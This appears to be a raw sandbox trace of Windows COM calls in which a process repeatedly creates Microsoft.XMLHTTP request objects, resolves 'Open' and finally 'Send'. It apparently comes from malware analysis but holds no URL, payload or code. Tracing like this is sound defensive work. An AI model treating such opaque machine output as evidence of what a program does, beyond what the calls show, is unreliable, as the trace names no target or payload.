	[0564.290] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0564.290] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0564.290] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5bc0) returned 0x0
	[0564.290] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0564.290] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5bc0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7878) returned 0x0
	[0564.290] ??2@YAPEAX_K@Z () returned 0x62f330
	[0564.290] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7878, pUnkSite=0x62f330) 
	[0564.290] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0564.291] XMLHTTPRequest:IUnknown:Release (This=0x49c7878) returned 0x0
	[0564.291] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5bc0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5bc0) returned 0x0
	[0564.291] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5bc0) returned 0x3
	[0564.291] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5bc0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0564.291] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5bc0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0564.293] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5bc0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0564.293] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0564.293] SysStringLen (param_1=0x0) returned 0x0
	[0564.293] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0564.294] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0564.294] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5c70) returned 0x0
	[0564.294] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0564.294] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c70, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7208) returned 0x0
	[0564.294] ??2@YAPEAX_K@Z () returned 0x62f310
	[0564.294] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7208, pUnkSite=0x62f310) 
	[0564.294] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0564.294] XMLHTTPRequest:IUnknown:Release (This=0x49c7208) returned 0x0
	[0564.294] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c70, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5c70) returned 0x0
	[0564.294] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5c70) returned 0x3
	[0564.294] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c70, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0564.294] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5c70, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0564.294] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c70, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0564.294] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0564.294] SysStringLen (param_1=0x0) returned 0x0
	[0564.295] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0564.295] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0564.295] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5aa0) returned 0x0
	[0564.295] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0564.295] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5c28) returned 0x0
	[0564.295] ??2@YAPEAX_K@Z () returned 0x62f330
	[0564.295] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5c28, pUnkSite=0x62f330) 
	[0564.295] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0564.295] XMLHTTPRequest:IUnknown:Release (This=0x49c5c28) returned 0x0
	[0564.295] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5aa0) returned 0x0
	[0564.295] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5aa0) returned 0x3
	[0564.295] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0564.295] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5aa0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0564.295] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0564.296] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0564.296] SysStringLen (param_1=0x0) returned 0x0
	[0564.296] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0564.296] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0564.296] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5ba0) returned 0x0
	[0564.296] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0564.296] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5ba0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7208) returned 0x0
	[0564.296] ??2@YAPEAX_K@Z () returned 0x62f310
	[0564.296] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7208, pUnkSite=0x62f310) 
	[0564.296] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0564.296] XMLHTTPRequest:IUnknown:Release (This=0x49c7208) returned 0x0
	[0564.296] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5ba0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5ba0) returned 0x0
	[0564.296] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5ba0) returned 0x3
	[0564.296] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5ba0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0564.296] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5ba0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0564.296] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5ba0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0564.297] longjmp () 
	[0564.297] longjmp () 
	[0564.297] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0564.297] SysStringLen (param_1=0x0) returned 0x0
	[0564.297] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0564.297] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0564.297] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5c00) returned 0x0
	[0564.297] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0564.297] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c00, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5c68) returned 0x0
	[0564.297] ??2@YAPEAX_K@Z () returned 0x62f330
	[0564.297] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5c68, pUnkSite=0x62f330) 
	[0564.297] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0564.297] XMLHTTPRequest:IUnknown:Release (This=0x49c5c68) returned 0x0
	[0564.297] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c00, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5c00) returned 0x0
	[0564.297] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5c00) returned 0x3
	[0564.297] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c00, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0564.298] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5c00, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0564.298] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c00, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0564.298] longjmp () 
	[0564.298] longjmp () 
	[0564.298] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0564.298] SysStringLen (param_1=0x0) returned 0x0
	[0564.298] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0564.298] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0564.298] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5aa0) returned 0x0
	[0564.298] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0564.298] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7208) returned 0x0
	[0564.298] ??2@YAPEAX_K@Z () returned 0x62f310
	[0564.298] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7208, pUnkSite=0x62f310) 
	[0564.298] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0564.299] XMLHTTPRequest:IUnknown:Release (This=0x49c7208) returned 0x0
	[0564.299] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5aa0) returned 0x0
	[0564.299] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5aa0) returned 0x3
	[0564.299] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0564.299] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5aa0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0564.299] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0564.299] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0564.299] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5aa0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Send", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=5) returned 0x0
	[0564.299] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0564.629] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd48 | out: ppvObject=0x28dd48*=0x0) returned 0x80004002
